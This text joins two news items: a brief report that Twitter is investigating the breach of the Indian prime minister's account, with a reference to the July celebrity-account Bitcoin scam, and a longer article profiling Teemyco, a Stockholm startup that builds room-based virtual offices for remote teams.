Twitter is investigating the breach of the Indian PM’s account (the account has since been reset and the hackers’ tweets deleted). The incident follows in the footsteps of the much-publicized attack in July, when hackers gained access to around 130 celebrity accounts and used them to tweet in concert in an attempt to get people to “donate” to a single Bitcoin wallet. This is another reminder that the social media accounts of national and political leaders are high-value assets and need to be protected as such, to reduce the risk of manipulation and misconduct on a national or even international level.


Teemyco creates virtual offices so you can grab a room and talk with colleagues

Meet Teemyco, a Stockholm-based startup that wants to reproduce office interactions in a virtual environment. The company wants to foster spontaneous interactions and casual collaboration with a room-based interface. Each employee moves from one room to another just like in a physical office.

If you’re no longer working from an office, chances are you rely heavily on email, Slack, Microsoft Teams, Zoom, Google Meet or a combination of all those tools. While those tools work perfectly fine for what they’re designed to achieve, many companies feel like important information is getting lost. It’s harder to bump into a colleague next to the coffee machine and ask a quick question.

With Teemyco, each person is working in a virtual room. By default, you work in the lobby. You can consider it as an open space with multiple desks. When you want to get together for a planned or unplanned meeting, you can pull someone from the lobby and create another room.

In that room, you can start an audio call or a video call. You can see your colleagues in the corner of your screen and stay focused on a document at the same time, or you can put a video call in full screen. When someone is done, they can leave the room.

Those interactions are less formal than what you get with video-conferencing services. You don’t have to send a link to a Zoom room, you don’t have to send a calendar invite. People hop in and hop out.

If you’re working on something important, you can move to a focus room so that you don’t get interrupted every 15 minutes. Other people won’t be able to pull you from your virtual desk. If you have to run some errands, you can also put yourself in a room that says you’re not there — those rooms can act as a status.

Teemyco also helps you work next to your favorite colleague. You can create a room and use a walkie-talkie feature for quick interactions throughout the day. And, of course, you can create a break room for non-work-related discussions.

Teemyco is still a young company. The product is only available in beta. The company raised a $1 million seed round led by Luminar Ventures with Antler, Gazella and various business angels also participating.

It’s also not going to work for all companies. I’m not sure it scales well for a company with hundreds of employees, for instance. Introverts might not be fans of real-time communication either.

If you’re a remote-first company, you know that it’s important to have a culture of transparency. And written information is always more transparent than video conferences.

And yet, depending on your corporate culture, something like Teemyco can be useful. It can augment information stored in shared documents and internal communication tools.

It’s an interesting product that proves that the inevitable debate between physical offices and remote teams is not a binary problem. There is some granularity, and companies can adjust the knob depending on specific needs.